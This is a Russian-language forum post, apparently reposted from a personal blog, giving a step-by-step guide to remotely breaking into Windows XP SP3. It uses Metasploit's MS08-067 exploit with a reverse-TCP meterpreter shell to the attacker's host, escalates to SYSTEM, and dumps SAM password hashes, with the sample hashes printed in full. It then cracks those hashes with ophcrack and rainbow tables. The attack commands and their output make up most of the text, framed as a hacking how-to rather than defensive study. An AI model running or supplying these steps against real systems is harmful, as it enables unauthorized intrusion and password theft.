Показать сообщение отдельно
Старый 03.03.2012, 10:57      #1 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Metasploit. Ophcrack. Взлом Windows XP (удаленный взлом пароля)

Всем привет!

Давайте сегодня поговорим про взлом Windows XP SP3. Не думайте, что тема про взлом Windows XP уже не актуальна! Еще как актуальна, до сих пор доля на рынке операционных систем Windows XP занимает лидирующие позиции, что позволяет использовать многочисленные эксплоиты. Я остановился на популярном эксплоите MS08_067, о котором вы можете прочитать здесь. Про статистику и долю на рынке ОС вы можете прочитать здесь или воспользуйтесь поиском.

Итак, приступим!

Для начала обновим Metasploit:

Код:
# msfupdate

Запускаем Metasploit:

Код:
# msfconsole

Вводим команды:

Код:
> use windows/smb/ms08_067_netapi
> set rhost 192.168.1.4
> set rport 445
> set lhost 192.168.1.5
> set lport 4444
> set payload windows/meterpreter/reverse_tcp
  • rhost – IP-адрес удаленного пользователя (remote host)
  • rport – порт удаленного пользователя (remote port)
  • lhost – IP-адрес атакующего (local host)
  • lport – порт атакующего (local port)

Проверяем все ли опции заданы:

Код:
> show options

Убеждаемся, что все в порядке.

Click the image to open in full size.

Теперь запускаем эксплоит:

Код:
> exploit

Click the image to open in full size.

Отлично! Мы в системе.

Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:

Код:
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM

Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:

Код:
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Мы можем попробовать поднять наши права в системе командой getsystem:

Код:
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM

Это было небольшое отступление, идем дальше.

Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.

Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:

Код:
meterpreter > hashdump
Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
HelpAssistant:1000:635e6894ad2400afc97d6c747dc0976a:c489103aa4919d38017486860a7e0b2d:::
Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a6f7ec01c389c27cb4db76b7b0de220:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Синтаксис вывода такой: <User_Name>:<User_ID>:<LM Hash>:<NT Hash>:::

Чтобы расшифровать хэшы можно воспользоваться многочисленными онлайн сервисами, например cmd5.ru. Но я решил убить двух зайцев сразу, поэтому сейчас покажу вам, как это сделать с помощью программы ophcrack.

Запускаем ophcrack:

Код:
# ophcrack

Click the image to open in full size.

Теперь нам необходимо скачать rainbow tables к ней, поэтому переходим по этой ссылке и скачиваем архив под названием “XP free small (380MB)“. Для наших экспериментов понадобится только он, но вы можете скачать все, дело ваше. Сохраняем архив с rainbow tables в систему, потом извлекаем. Как разархивировать zip архив в Linux можно прочитать здесь.

Переходим в ophcrack и нажимаем кнопку Tables. В появившемся окне выбираем XP free small, потом нажимаем Install и выбираем директорию с rainbow таблицами. Я разархивировал их в /root/tables/.

Click the image to open in full size.

Когда rainbow таблицы выбраны, нажимаем на кнопку Load и выбираем пункт Single hash. Перед вами появится окно (см. рисунок ниже), в котором вводим интересующую вас строку вывода команды hashdump. Я выбрал вот эти строки:
  • Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7e aee8fb117ad06bdd830b7586c:::
  • Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bd b5fdc5e9cba88547376818d4:::

Нажимаем кнопку OK.

Click the image to open in full size.

Осталось щелкнуть по кнопке Crack и пароли будут получены.

Click the image to open in full size.

Вот и все! Как всегда ничего сложного. Дальше будет еще интереснее, поэтому оформляйте подписку по E-MAIL или RSS, чтобы следить за выходом новых статей.

Дополнительные материалы:
Источник: www.levinkv.ru
levinkv вне форума   Ответить с цитированием
 
Время генерации страницы 0.08673 секунды с 15 запросами